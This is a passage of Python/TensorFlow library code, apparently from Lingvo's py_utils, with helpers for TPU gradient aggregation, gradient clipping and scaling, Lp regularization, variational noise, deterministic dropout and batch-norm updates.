skip_zero_gradients=None):
"""Computes gradients for local loss across whole TPU cluster.
This implementation specializes for the case where weight params maybe used
for different number of times in the forward computation, so that gradients
should be normalized by the actual number of times they are being computed.
TODO(yonghui): Maybe merge this implementation with the _ComputeGradientsTpu
one.
Args:
loss: The loss to backprop from.
all_vars: Vars with respect to which gradients are to be computed.
grad_aggregation_method: aggregation method to use when calling
tf.gradients.
colocate_gradients_with_ops: boolean, whether or not to colocate gradient op
with the original op.
gate_gradients: boolean, flag to be passed to tf.gradients.
skip_zero_gradients: whether to skip zero gradients during aggregation.
Returns:
Gradients to be passed back.
Raises:
ValueError: upon invalid arguments.
"""
if not skip_zero_gradients:
# Scale the loss to account for the full batch size.
shards = tpu_function.get_tpu_context().number_of_shards
assert shards
loss *= tf.constant(1.0 / shards, dtype=loss.dtype)
# Computes the gradients.
# Sum the grads so that we can compute statistics across the whole batch.
all_grads = ComputeGradientsSimple(loss, all_vars, grad_aggregation_method,
colocate_gradients_with_ops,
gate_gradients)
# NOTE: We can't use tpu_optimizer.CrossShardOptimizer since
# we need to scale the grads *after* the cross_replica_sum to
# match GPU version!
# TODO(cwhipkey): should we do something different here? - we could do
# some operations on the gradients before the aggregation (see comments in
# tensorflow/contrib/tpu/python/tpu/tpu_optimizer.py - see compute_gradients -
# for some more details).
aggregated_grads = []
for g in all_grads:
if g is None:
aggregated_grads.append(None)
continue
with tf.colocate_with(g):
if skip_zero_gradients is None:
# loss is already scaled by 1/shards.
normalized_g = tf.tpu.cross_replica_sum(g)
else:
# Compute the cross-replica mean of 'g', skipping zero gradients.
# Q(yonghui): Is there a better way to detect a non-zero gradient?
# Note(yonghui): gradient of a weight can be zero if that
# weight is not used in the forward computation, e.g. as in
# switchable layers in neural architecture search, pruned by channel
# mask, or sparsified.
if skip_zero_gradients == 'weight':
# Same shape as 'g'.
g_is_non_zero = tf.cast(tf.math.abs(g) > 1e-8, g.dtype)
elif skip_zero_gradients == 'variable':
# A variable-wide 0/1 scalar.
g_is_non_zero = tf.cast(
tf.reduce_sum(tf.math.abs(g)) > 1e-24, g.dtype)
else:
raise ValueError('Unknown skip_zero_gradients: %s' %
skip_zero_gradients)
num_updates = tf.maximum(tf.tpu.cross_replica_sum(g_is_non_zero), 1.0)
normalized_g = tf.tpu.cross_replica_sum(g) / num_updates
aggregated_grads.append(normalized_g)
return aggregated_grads
class VarGrad(object):
"""A class that holds a variable and a gradient."""
_VAR_GRAD = py_collections.namedtuple('VarGradNamedTuple', ['var', 'grad'])
def __init__(self, *args, **kwargs):
self._var_grad = self._VAR_GRAD(*args, **kwargs)
def __getitem__(self, key):
return self._var_grad[key]
def __getattr__(self, key):
return getattr(self._var_grad, key)
def __iter__(self):
return iter(self._var_grad)
def __repr__(self):
return 'VarGrad(%r, %r)' % (self._var_grad.var, self._var_grad.grad)
def ComputeGradients(
loss,
vmap,
grad_aggregation_method=tf.AggregationMethod.EXPERIMENTAL_TREE,
colocate_gradients_with_ops=True,
gate_gradients=False,
compute_gradients_fn=None,
skip_zero_gradients=None):
"""Computes gradients of variables in vmap w.r.t loss.
Args:
loss: A scalar Tensor.
vmap: A `.NestedMap` of variables.
grad_aggregation_method: Specifies the method used to combine gradient
terms. Accepted values are constants defined in the class
AggregationMethod.
colocate_gradients_with_ops: If True, try colocating gradients with the
corresponding op.
gate_gradients: If True, add a tuple around the gradients returned for an
operations. This avoids some race conditions.
compute_gradients_fn: Function to use to compute gradients. If None, use
default. compute_gradients_fn should have the same signature as this
function, but without the last argument.
skip_zero_gradients: Whether to skip aggregating zero gradients. This helps
in case where some weights may not be used in forward computation, e.g.,
sparsely activated networks or switchable layers in neural architectural
search. Only applicable on TPU.
Possible values are:
* None: do not skip zero gradients;
* `variable`: skip if the entire variable's gradients are almost zero;
reduce_sum(abs(grads)) < 1e-8.
* `weight`: skip if the individual weight's gradients are almost zero:
abs(grad) < 1e-8.
Returns:
var_grad - a `.NestedMap` of VarGrad. You can view
var_grad as an ordered list of (key, (var, grad)) tuples. Every
key of var_grad exists in vmap. Every variable in vmap that
contributes to loss must exist in var_grad. Every var of var_grad
must exist in vmap. grad is the corresponding gradient computed
for var. grad is guaranteed to be not None.
"""
loss = HasRank(loss, 0)
assert isinstance(vmap, NestedMap)
assert skip_zero_gradients in (None, 'variable', 'weight')
# Uniqify and remove None.
filtered_vmap = vmap.Filter(_Unique())
assert filtered_vmap is not None
# Filter out variables not contributing to 'loss'.
trainable_variables = set(tf.trainable_variables())
dependent_ops_and_tensors = set(FindNeeded([loss]))
def Needed(v):
if isinstance(v, tf.Variable):
if v not in trainable_variables:
# Skip non-trainable variables. Otherwise,
# tf.Optimizer.apply_gradients throws up an exception instead
# of skipping the update.
return False
return True
filtered_vmap = filtered_vmap.Filter(Needed)
assert filtered_vmap is not None
filtered_vlist = filtered_vmap.Flatten()
# Use caller-supplied gradient function if supplied.
if compute_gradients_fn is not None:
take_grad = compute_gradients_fn
else:
# tpu vs non-tpu is slightly different.
if use_tpu():
take_grad = functools.partial(
_ComputeGradientsTpu, skip_zero_gradients=skip_zero_gradients)
else:
take_grad = ComputeGradientsSimple
grads = take_grad(loss, filtered_vlist, grad_aggregation_method,
colocate_gradients_with_ops, gate_gradients)
# Formulate pairs of (var, grad) and pack them into the same
# structure as filtered_vmap.
var_grads = filtered_vmap.Pack(
[VarGrad(v, g) for v, g in zip(filtered_vlist, grads)])
# TPU training is not compatible with the variable name check below when
# control flow v2 is enabled. The main reason is the body function will be
# encapsulated as a TF function while variables will be lifted out, and as a
# result dependent_ops_and_tensors will not contain any variables. See
# b/150689507 for more info.
if not tf.compat.v1.control_flow_v2_enabled():
# Check that gradients for variables that are not needed by current task is
# empty.
def CheckGrad(vg):
if vg.var.name not in dependent_ops_and_tensors and vg.grad is not None:
err_msg = ('Variable %s is not a dependent of %s, expect '
'gradient be None, but got %s. This should not happen, '
'please contact the owner of b/150689507 for further '
'investigation.' % (str(vg.var), str(loss), str(vg.grad)))
assert False, err_msg
return True
var_grads = var_grads.Filter(CheckGrad)
# Removes pairs whose grad is None.
for key, (_, g) in var_grads.FlattenItems():
if g is None:
tf.logging.info('ComputeGradients drops %s', key)
return var_grads.Filter(lambda var_grad: var_grad.grad is not None)
def MaskGradients(var_grad, grad_mask):
"""Computes gradients of non-masked variables in vmap w.r.t loss.
Args:
var_grad: A `.NestedMap` of (variable, gradient)
grad_mask: A dict of (variable name, mask).
Returns:
var_grad - a `.NestedMap` of (variable, mask * gradient).
"""
def ApplyMask(entry):
var, grad = entry
mask = grad_mask[var.name]
if isinstance(grad, tf.IndexedSlices):
return VarGrad(var, tf.IndexedSlices(grad.values * mask, grad.indices))
else:
return VarGrad(var, grad * mask)
return var_grad.Transform(ApplyMask)
def ApplyGradMultiplier(vs_gs, grad_scale=None):
"""Scale gradients by grad_scale on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
grad_scale: If None, each vs_gs entry has the scale. Otherwise, grad_scale
applies to every entry.
Returns:
A `.NestedMap` of (variable, gradient * grad_scale). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ScaleOrZero(var, grad, scale):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.where(
tf.equal(scale, 0.), tf.zeros_like(grad),
tf.cast(scale, grad.dtype) * grad)
def Scale(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
if grad_scale is None:
scale = item.scale
else:
scale = grad_scale
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ScaleOrZero(var, grad.values, scale), grad.indices,
grad.dense_shape)
else:
grad = ScaleOrZero(var, grad, scale)
return VarGrad(var, grad)
return vs_gs.Transform(Scale)
def HasNanOrInfGradient(var_grads):
"""Returns a bool tensor to indicate if `var_grads` contains NaNs or Infs.
Args:
var_grads: A `.NestedMap` with (var, grad) tuple as the map value.
Returns:
A bool scalar tensor to indicate if the `var_grads` contains NaNs or Infs.
"""
def HasNanOrInf(x):
if isinstance(x, tf.IndexedSlices):
x = x.values
with tf.device(x.device):
if x.dtype.is_complex:
return tf.reduce_any([HasNanOrInf(tf.real(x)), HasNanOrInf(tf.imag(x))])
return tf.reduce_any(tf.logical_or(tf.is_nan(x), tf.is_inf(x)))
return tf.reduce_any([HasNanOrInf(g) for (_, g) in var_grads.Flatten()])
def ApplyGradNormClipping(vs_gs, norm=1.0):
"""Clip gradients to norm on same device as corresponding variables.
Args:
vs_gs: A `.NestedMap` of VarGrad.
norm: Each tensor's gradient will be scaled down to have a maximum L2-norm
value of `norm`.
Returns:
A `.NestedMap` of VarGrad(variable, scaled_gradient). In particular, if
grad_scale is 0, the result gradient is always 0, even if the input
gradient is inf or nan.
"""
def ClipByNorm(var, grad, norm):
grad = CheckNumerics(grad, 'Gradient for %s is not finite.' % var.name)
return tf.clip_by_norm(grad, norm)
def Clip(item):
"""Scales the gradient."""
var, grad = item
assert grad is not None, ('No grad found for ', var.name)
with tf.device(var.device):
if isinstance(grad, tf.IndexedSlices):
grad = tf.IndexedSlices(
ClipByNorm(var, grad.values, norm), grad.indices, grad.dense_shape)
else:
grad = ClipByNorm(var, grad, norm)
return VarGrad(var, grad)
return vs_gs.Transform(Clip)
SKIP_LP_REGULARIZATION = '__lingvo_skip_lp_regularization'
def AdjustGradientsWithLpLoss(var_grads, lp_regularizer_weight, p=2.0):
"""Adjusts the map of (var, grad) with Lp regularization, where p=1.0 or 2.0.
Args:
var_grads: a `.NestedMap` or list of (variable, gradient).
lp_regularizer_weight: Lp regularization weight.
p: For now we support 1.0 or 2.0.
Returns:
A tuple (lp_loss, var_grads).
- lp_loss: A scalar. The lp loss.
- var_grads: a `.NestedMap` or list of (variable, gradient) regulated by Lp.
"""
# TODO(yuancao): For now we support p=1 or 2, but this can be extended to
# lp-norm in general.
assert p in [2.0, 1.0], 'For now we only support L1/L2 regularization.'
def GetVar(item):
var, grad = item
if isinstance(grad, tf.IndexedSlices):
with tf.device(var.device):
ids = HasRank(grad.indices, 1)
uniq_ids = tf.unique(ids).y
return tf.gather(var, uniq_ids)
else:
return var
def ShouldAdjust(v):
return v not in tf.get_collection(SKIP_LP_REGULARIZATION)
filtered_var_grads = [
var_grad for var_grad in Flatten(var_grads) if ShouldAdjust(var_grad.var)
]
filtered_vars = Transform(GetVar, filtered_var_grads)
for v in filtered_vars:
tf.logging.info('AdjustGradientsWithLpLoss: %s', v.name)
if p == 2.0:
lp_loss = 0.5 * lp_regularizer_weight * SumSquared(filtered_vars)
elif p == 1.0:
lp_loss = lp_regularizer_weight * SumAbs(filtered_vars)
def LpGrad(var_grad):
"""Adjusts item's grad w/ Lp loss term."""
var, grad = var_grad
if isinstance(grad, tf.IndexedSlices):
# Question(rpang): do we apply Lp loss here even if 'var' is in
# SKIP_LP_REGULARIZATION?
#
# Note: IndexedSlces appears for embedding lookups.
# Embedding lookup ids can have duplicate. For duplicated ids, we
# only want to consider once for each ids.
with tf.device(var.device):
emb = HasRank(var, 2)
vocab_size = tf.shape(emb)[0]
ids = HasRank(grad.indices, 1)
values = tf.gather(emb, ids) # [#ids, dims]
with tf.device(grad.device):
# Counts is a vector of size vocab_size. counts[i] is i-th words
# occurances in 'ids'.
counts = tf.unsorted_segment_sum(
tf.ones_like(ids, dtype=values.dtype), ids, vocab_size)
# Gradients for duplicated ids will be summed when they get
# applied, and hence we account for that by first dividing
# gradient resulting from lp loss by how many times the id is
# duplicated.
#
# For each id in 'ids', we know counts[id] is non-zero,
# hence, it's always safe to take reciprocal.
weights = tf.reciprocal(tf.gather(counts, ids))
weights = tf.expand_dims(weights, -1) # [#ids, 1]
if p == 2.0:
grad_v = values
elif p == 1.0:
grad_v = tf.sign(values)
delta = lp_regularizer_weight * weights * grad_v
grad = tf.IndexedSlices(grad.values + delta, ids)
elif var not in tf.get_collection(SKIP_LP_REGULARIZATION):
with tf.device(var.device):
if p == 2.0:
grad_v = var
elif p == 1.0:
grad_v = tf.sign(var)
delta = lp_regularizer_weight * grad_v
with tf.device(grad.device):
grad += delta
return VarGrad(var, grad)
return lp_loss, Transform(LpGrad, var_grads)
def SplitRecursively(x, num_splits, axis=-1):
"""Splits Tensors in 'x' recursively.
Args:
x: a Tensor, or a list or NestMap containing Tensors to split.
num_splits: number of splits per Tensor.
axis: the split axis.
Returns:
A list of split values of length 'num_splits'.
- If 'x' is a Tensor, a list of split Tensors.
- If 'x' is a list, a list of lists, where each sublist has the same length
as 'x' and the k'th element in each sublist corresponds to a split of the
k'th element from 'x'.
- If 'x' is a `.NestedMap`, a list of `.NestedMap`, where each field
corresponds to a split from the same field of 'x'.
"""
if isinstance(x, tf.Tensor):
return tf.split(x, num_splits, axis=axis)
elif isinstance(x, list):
splits = [SplitRecursively(element, num_splits, axis) for element in x]
splits = list(zip(*splits))
return [list(t) for t in splits]
elif isinstance(x, NestedMap):
results = [NestedMap() for _ in range(num_splits)]
for key, val in six.iteritems(x):
val_splits = SplitRecursively(val, num_splits, axis)
for i in range(num_splits):
results[i][key] = val_splits[i]
return results
else:
raise TypeError('Unexpected type for SplitRecursively: %s' % type(x))
def ConcatRecursively(splits, axis=-1):
"""Concatenates tensors from 'splits'.
This is the inverse function of SplitRecursively.
Args:
splits: a list of splits to concatenate, where elements can be Tensors,
lists, or `.NestedMap`. The elements must share the same type and
structure. For example, list elements must have the same length;
`.NestedMap` must have the same set of fields.
axis: the concatenation axis.
Returns:
Concatenated data.
- If input 'splits' are Tensors, returns a concatenated Tensor.
- If input 'splits' are lists, returns a list of the same length where the
k'th element represents concatenated data of the k'th element from each
split.
- If input 'splits' are `.NestedMap`, returns a `.NestedMap` with each field
concatenated from corresponding fields of input splits.
Raises:
TypeError: if 'splits' is not a list or elements of 'splits' do not have
known or matching types.
ValueError: if 'splits' is empty or elements of 'splits' do not have
matching structures.
"""
if not isinstance(splits, list):
raise TypeError('Non-list inputs for ConcatRecursively: %s' % splits)
if not splits:
raise ValueError('Empty inputs for ConcatRecursively: %s' % splits)
tmpl = splits[0]
if isinstance(tmpl, tf.Tensor):
return tf.concat(splits, axis=axis)
elif isinstance(tmpl, list):
if not all(isinstance(split, list) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
if not all(len(split) == len(tmpl) for split in splits):
raise ValueError('Length mismatch for ConcatRecursively: %s' % splits)
return [
ConcatRecursively([split[i]
for split in splits], axis)
for i in range(len(tmpl))
]
elif isinstance(tmpl, NestedMap):
if not all(isinstance(split, NestedMap) for split in splits):
raise TypeError('Type mismatch for ConcatRecursively: %s' % splits)
results = NestedMap()
for key in tmpl:
results[key] = ConcatRecursively([split[key] for split in splits], axis)
return results
else:
raise TypeError('Unexpected type for ConcatRecursively: %s' % type(splits))
def AddToPruningCollections(weight,
mask,
threshold,
gradient=None,
old_weight=None,
old_old_weight=None):
"""Add mask, threshold, and weight vars to their respective collections."""
if mask not in tf.get_collection(pruning.MASK_COLLECTION):
tf.add_to_collection(pruning.WEIGHT_COLLECTION, weight)
tf.add_to_collection(pruning.MASK_COLLECTION, mask)
tf.add_to_collection(pruning.THRESHOLD_COLLECTION, threshold)
# Add gradient, old_weight, and old_old_weight to collections approximating
# gradient and hessian, where old_weight is the weight tensor one step
# before and old_old_weight is the weight tensor two steps before.
if gradient is not None:
assert old_weight is not None
assert old_old_weight is not None
tf.add_to_collection(pruning.WEIGHT_GRADIENT_COLLECTION, gradient)
tf.add_to_collection(pruning.OLD_WEIGHT_COLLECTION, old_weight)
tf.add_to_collection(pruning.OLD_OLD_WEIGHT_COLLECTION, old_old_weight)
def WeightedAvg(values, weights, sum_reduction_fn=tf.reduce_sum, name=''):
"""Computes weighted average of values from a tensor.
Args:
values: a tensor of values
weights: a tensor of weights
sum_reduction_fn: called to reduce the values and weights to single value
name: name of metric.
Returns:
A tuple (avg, total_weight).
- avg: weighted average value
- total_weight: sum of all weights
"""
msg = 'shape of values and weights tensors must match for metric ' + name
values = with_dependencies(
[assert_equal(tf.shape(values), tf.shape(weights), message=msg)], values)
total_weight = sum_reduction_fn(weights)
avg = sum_reduction_fn(values * tf.cast(weights, values.dtype)) / tf.cast(
total_weight, values.dtype)
return avg, total_weight
def WeightedAvgOfMetrics(metrics):
"""Computes the weighted average of metrics in the list.
Args:
metrics: list of dictionaries of metrics
Returns:
ret_dict - dictionary of weighted averages of each metrics.
"""
ret_dict = {}
lists_of_metrics = {}
for m in metrics:
for name, (value, weight) in six.iteritems(m):
if name not in lists_of_metrics:
lists_of_metrics[name] = []
lists_of_metrics[name].append((value, weight))
for name, values_and_weights in sorted(six.iteritems(lists_of_metrics)):
values = tf.stack([x[0] for x in values_and_weights])
weights = tf.stack([x[1] for x in values_and_weights])
ret_dict[name] = WeightedAvg(values, weights, tf.reduce_sum, name)
return ret_dict
def ConcatPerExampleTensors(per_example):
"""Concatenate per-example tensors from many hosts into one large block.
Args:
per_example: list of dictionaries of per-example tensors.
Returns:
ret_dict - string -> concatenated tensors.
"""
ret_dict = {}
lists_of_per_example = {}
for m in per_example:
for name, value in six.iteritems(m):
if name not in lists_of_per_example:
lists_of_per_example[name] = []
lists_of_per_example[name].append(value)
for name, values in sorted(six.iteritems(lists_of_per_example)):
ret_dict[name] = tf.concat(values, 0)
return ret_dict
def CombineMetrics(loss_metric_weight_pairs):
"""Combines metrics from `loss_metric_weight_pairs` according to weights.
Keys must either exist in all metrics, in which it will be processed as a
weighted sum, or exist in only one metrics, in which case it will be copied.
Args:
loss_metric_weight_pairs: a list of (metrics, weight) pairs, where each
weight is a float and each metrics is a dict with str keys and
(metric_value, target_weight) values.
Returns:
A dict with the same set of keys as input metrics and values of
(weighted_sum(metric_value), weighted_sum(target_weight)).
Raises:
ValueError: if there exists a metric that exists in more than one element
of `loss_metric_weight_pairs` but not in all of them.
"""
all_keys = set([
k for loss_metrics, _ in loss_metric_weight_pairs
for k in six.iterkeys(loss_metrics)
])
result = {}
for k in all_keys:
count = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
count += 1
if count > 1 and count != len(loss_metric_weight_pairs):
raise ValueError('Found metric %s which exists in more than one'
'but not all loss metrics.' % k)
total_val = 0
total_target_weight = 0
for loss_metrics, weight in loss_metric_weight_pairs:
if k in loss_metrics:
val, target_weight = loss_metrics[k]
if count == 1:
# Single metric, don't multiply by weight.
total_val = val * target_weight
total_target_weight = target_weight
else:
# Total weighted sum of all predictions.
total_val += weight * val * target_weight
total_target_weight += weight * target_weight
result[k] = (total_val / total_target_weight, total_target_weight)
return result
def _AddVN(p, x, step=None):
assert p.vn.scale is not None
seed = p.vn.seed
if seed and step:
seed += step * 203984
noises = tf.cast(p.vn.scale, x.dtype) * tf.random_normal(
tf.shape(x), stddev=1.0, seed=seed, dtype=x.dtype)
return x + noises
def AddGlobalVN(params, weights):
"""Adds variational noise to weights if specified by params."""
p = params
if p.vn.global_vn:
weights = _AddVN(p, weights)
return weights
def AddPerStepVN(params, weights, step=None):
"""Adds per-setp variational noise to weights if specified by params."""
p = params
if p.vn.per_step_vn:
weights = _AddVN(p, weights, step)
return weights
def VariationalNoiseParams(scale,
global_vn=False,
per_step_vn=False,
seed=None):
"""Returns a hyperparams for variational noise."""
p = hyperparams.Params()
p.Define(
'scale', scale,
'Std of the variational noise to apply . This can be a scalar,'
' or a scalar tensor.')
p.Define('global_vn', global_vn,
'Adds global variational noise every training setp iff True.')
p.Define('per_step_vn', per_step_vn,
'Adds per-timesetp variational noise iff True.')
p.Define('seed', seed, 'Random seed used to generate noise.')
return p
# To disable VN of a layer, we use 1.0 in the first input parameter
# of the following function because otherwise it is the same to DefaultVN()
# configuration of base_layer, which will be updated by parent configuration in
# CopyBaseParams()
def DisableVN():
return VariationalNoiseParams(1.0, False, False)
def GetStepSeed():
"""Gets step_seed."""
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if not step_seed_tensors:
ResetStepSeed()
return GetStepSeed()
elif len(step_seed_tensors) == 1:
return step_seed_tensors[0]
else:
raise ValueError('Multiple tensors in step_seed collection.')
def ResetStepSeed(seed=0):
"""Resets step_seed to specified value."""
new_step_seed = tf.convert_to_tensor(seed, dtype=tf.int64)
step_seed_tensors = tf.get_default_graph().get_collection_ref('step_seed')
if len(step_seed_tensors) == 1:
step_seed_tensors[0] = new_step_seed
elif not step_seed_tensors:
tf.add_to_collection('step_seed', new_step_seed)
else:
raise ValueError('Multiple tensors in step_seed collection.')
def GetIncStepSeed():
"""Returns and increments the step_seed."""
step_seed = GetStepSeed()
# TODO(lepikhin): introduce a routine filling a queue of uint32 random seeds
# independent of underlying PRNG used by tensorflow.
ResetStepSeed(step_seed + 1)
return step_seed
def GenerateStepSeedPair(p, global_step, op_seed=None):
"""Generates a seed pair for deterministic random operations in functional loops.
This function retrieves a unique seed pair on each call, based off the current
global step and step seed. The step seed ensures this function returns a
unique seed pair on each call: calling this function automatically increments
the step seed. The step seed is automatically reset at the beginning of each
global step in the model's FProp and works transparently through recurrent.py.
Args:
p: A hyperparams.Params object, containing keys 'random_seed' and
'is_inference'.
global_step: The global step.
op_seed: An additional operation-level seed to apply.
Returns:
A size 2 tensor of op seeds to use for stateless_random ops.
"""
seed_dtype = tf.int32 if use_tpu() else tf.int64
if p.is_inference and p.random_seed is None:
# Ensure GetIncStepSeed is called even inside the shortcut.
# This ensures if p.random_seed is set for other ops that use this function
# that they will get the same seed pair whether or not p.random_seed is set
# for this specific call.
GetIncStepSeed()
# Unlike tf.random*, stateless random ops are completely determined by the
# passed-in seeds. This means at inference time the same inputs will produce
# the same outputs, even if the model is supposed to have randomness such as
# dropout during inference. We inject additional randomness only during
# inference if the graph is exported with random_seed=None as a workaround.
return tf.random_uniform([2], maxval=seed_dtype.max, dtype=seed_dtype)
global_step = tf.cast(global_step, seed_dtype)
step_seed = tf.cast(GetIncStepSeed(), seed_dtype)
seeds = tf.stack([global_step, step_seed])
if p.random_seed is not None:
seeds += p.random_seed
if op_seed is not None:
seeds += op_seed
return seeds
def DeterministicDropout(x, keep_prob, seeds, noise_shape=None, name=None):
"""Similar to `tf.nn.dropout()`, but fully deterministic.
Args:
x: A float Tensor on which to apply dropout.
keep_prob: A scalar `Tensor` of keep probability.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated keep/drop flags.
name: An optional name for this operation.
Returns:
A Tensor with the same shape as `x`.
Raises:
InvalidArgumentError: if keep_prob is invalid.
"""
if isinstance(keep_prob, numbers.Real):
if keep_prob <= 0 or keep_prob > 1:
raise tf.errors.InvalidArgumentError(
'keep_prob must be in range (0, 1]. Value: {}'.format(keep_prob))
if keep_prob == 1:
return x
with tf.name_scope(name, 'dropout', [x]) as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
keep_prob = tf.convert_to_tensor(
keep_prob, dtype=tf.float32, name='keep_prob')
# uniform in [keep_prob, 1.0 + keep_prob)
# StatelessRandomUniform op does not support non-float (e.g. bfloat16) dtype
# and non-int32 seed types.
noise_shape = noise_shape or GetShape(x)
random_tensor = keep_prob + tf.random.stateless_uniform(
noise_shape, seed=seeds, dtype=tf.float32)
# 0. if [keep_prob, 1.0) and 1. if [1.0, 1.0 + keep_prob)
binary_tensor = tf.floor(random_tensor)
if x.dtype != tf.float32:
binary_tensor = tf.cast(binary_tensor, x.dtype)
keep_prob = tf.cast(keep_prob, dtype=x.dtype)
result = tf.div(x, keep_prob) * binary_tensor
result.set_shape(x.get_shape())
return result
def DeterministicVN(params, seeds, noise_shape, mean=0.0, std=1.0, name=None):
"""Produces Fully deterministic Gaussian noise from shape, mean and std.
Args:
params: Nested map of params.
seeds: A Tensor of shape [2]. 2 seeds for deterministic random number
generator.
noise_shape: A 1-D `Tensor` of type `int32`, representing the shape for
randomly generated Gaussian noise.
mean: Mean for the Gaussian noise.
std: Standard deviation for noise.
name: An optional name for this operation.
Returns:
A Tensor with the shape noise_shape and type fprop_dtype.
"""
with tf.name_scope(name, 'gaussian_noise') as name:
if use_tpu():
seeds = tf.cast(seeds, tf.int32)
random_tensor = mean + (
std * tf.random.stateless_normal(noise_shape, seed=seeds))
if FPropDtype(params) != tf.float32:
random_tensor = tf.cast(random_tensor, FPropDtype(params))
return random_tensor
BATCH_NORM_UPDATES = 'batch_norm_updates'
_BATCH_NORM_UPDATES_DICT = '__batch_norm_update_dict'
_get_batch_norm_updates_dict = _CollectionGetter(_BATCH_NORM_UPDATES_DICT,
lambda: {})
def UpdateBatchNormVars(batch_norm_var, batch_norm_stats, decay):
"""Update batch normalization moving averages."""
with tf.name_scope(
'AssignMovingAvg', values=[
batch_norm_var,
batch_norm_stats,
decay,
]) as scope:
with tf.colocate_with(batch_norm_var):
decay = tf.convert_to_tensor(
1.0 - decay, dtype=batch_norm_var.dtype.base_dtype)
update_delta = (batch_norm_var - batch_norm_stats) * decay
bn_update = tf.assign_sub(batch_norm_var, update_delta, name=scope)
tf.add_to_collection(BATCH_NORM_UPDATES, bn_update)
bn_update_dict = _get_batch_norm_updates_dict()
assert bn_update.name not in bn_update_dict
bn_update_dict[bn_update.name] = (batch_norm_var, batch_norm_stats)
return bn_update
def FindRelevantBatchNormUpdates(loss, batch_norm_updates):
"""Finds and returns a list of relevant batch-normalization updates.
Args:
loss: The loss that is being optimized for. A tensor or a list of tensors.
batch_norm_updates: A list of batch normalization updates.
Returns:
A pair of lists. The first list contains all the batch normalization updates
that are relevant to the loss being optimized, and the second list contains
all in batch_norm_updates but not in the first list.
"""
dependent_ops_and_tensors = set(FindNeeded(loss))
relevant_updates = []
irrelevant_updates = []
bn_update_dict = _get_batch_norm_updates_dict()
for bn_update in batch_norm_updates:
assert bn_update.name in bn_update_dict, (
'%s is probably not a valid batch normalization update op.'
' Make sure batch normalization is done through calling'
' the py_utils.UpdateBatchNormVars helper routine.')
bn_stat_name = bn_update_dict[bn_update.name][1].name
if bn_stat_name in dependent_ops_and_tensors:
# If a batch normalization stat is computed in the forward pass in
# computing loss, then the corresponding batch normalization update is
# relevant. Otherwise, it is not.
relevant_updates.append(bn_update)
else:
irrelevant_updates.append(bn_update)
return relevant_updates, irrelevant_updates
_SAMPLE_STEP_KEY = 'sample_step'
@contextlib.contextmanager
def SampleStep(step):
"""A context for a sample step during decoding.
Example usage::
with py_utils.SampleStep(step):
sample = self.DecodeOneStep()
Args:
step: the step tensor.
Yields:
a context manager for the step scope.
"""
stack = tf.get_collection_ref(_SAMPLE_STEP_KEY)
try:
stack.append(step)
yield step
finally:
stack.pop()
def _GetSampleStep():
stack = tf.get_collection(_SAMPLE_STEP_KEY)
return stack[-1] if stack else None
def AddDebugTensor(tensor, summarize=None, name=None):
"""Adds `tensor` to the debug collection.
Prints the tensor if `--print_debug_tensors` is True.
Args:
tensor: A tensor.
summarize: Only print this many entries of each tensor. If None, then a
maximum of 3 elements are printed per input tensor.
name: An optional name for the tensor.
Returns:
A Tensor that evaluates to the same value as the input tensor.
"""
if _FromGlobal('print_debug_tensors'):
step = _GetSampleStep()
tensors_to_print = ([] if step is None else [step]) + [tensor]
with tf.name_scope(name) as s:
tensor = tf.Print(
tensor,
tensors_to_print,
message='DEBUG tensor %s' % s,
name=name,
summarize=summarize)
return tensor
def ArgMax(inputs):
"""tf.argmax wrapper.
Args:
inputs: A tensor, whose last dimension is being reduced on.
Returns:
A tensor of rank tf.rank(logits)-1. If i == ret[indices],
logits[indices, i] is the maximum among logits[indices, :].
"""
if use_tpu():
return tf.argmax(inputs, axis=-1, output_type=tf.int32)
else:
return tf.argmax(inputs, axis=-1)
def _EnsureMatrixShape(x):
if x.shape.ndims is None:
x.set_shape([None, None])
else:
assert x.shape.ndims == 2
return x
def Matmul(x, y, *args, **kwargs):
"""tf.matmul wrapper expecting x and y are actually matrices."""
x = _EnsureMatrixShape(x)
y = _EnsureMatrixShape(y)
return tf.matmul(x, y, *args, **kwargs)
def clip_by_value(t, clip_value_min, clip_value_max, name=None): # pylint: disable=invalid-name
if t.dtype.is_complex:
return tf.complex(
tf.clip_by_value(
tf.real(t), clip_value_min, clip_value_max, '%s_real' % name),
tf.clip_by_value(
tf.imag(t), clip_value_min, clip_value_max, '%s_imag' % name))
return tf.clip_by_value(t, clip_value_min, clip_value_max, name)
def _TransformAndSum(tensor_list, transform):
with tf.name_scope('TransformAndSum'):
sum_transform = []
for t in tensor_list:
with tf.device(t.device):
if isinstance(t, tf.IndexedSlices):
sum_transform += [tf.reduce_sum(transform(t.values))]
else:
sum_transform += [tf.reduce_sum(transform(t))]
return tf.add_n(sum_transform)
def SumSquared(tensor_list):
return _TransformAndSum(tensor_list, lambda v: tf.abs(v)**2)
def SumAbs(tensor_list):
return _TransformAndSum(tensor_list, tf.abs)
def PiecewiseConstant(x_in, boundaries, values, vdtype):
"""Returns the piecewise value of x_in."""
x_in = tf.cast(tf.convert_to_tensor(x_in), tf.float32)
assert len(values) == len(boundaries) + 1
assert sorted(boundaries) == list(boundaries)
bs = tf.convert_to_tensor(boundaries, dtype=tf.float32)
vs = tf.convert_to_tensor(values, dtype=vdtype)
# The following is equivalent to 'return vs[index]'.
index = tf.reduce_sum(tf.cast(tf.greater(x_in, bs), tf.int32))
one_hot_vec = tf.one_hot(
tf.expand_dims(index, 0), depth=len(values), dtype=vdtype)
return Matmul(tf.reshape(vs, (1, -1)), tf.transpose(one_hot_vec))[0][0]
def PadSequenceDimension(x, length, pad_val, shape=None):
"""Pads x to `length` using `pad_val` along the second dim.
Assumes `x` is a tensor with rank >= 2, and it only pads `x` to `length`
along the second dim. Explicitly sets the returned tensor shape to `shape` if
given. Raises runtime errors if x.shape[1] > length or x.shape[i] != shape[i]
where i != 1.
Args:
